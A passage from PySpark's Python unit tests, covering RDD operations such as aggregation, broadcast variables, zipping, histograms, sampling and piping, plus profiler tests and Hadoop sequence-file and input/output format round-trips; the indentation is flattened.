data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
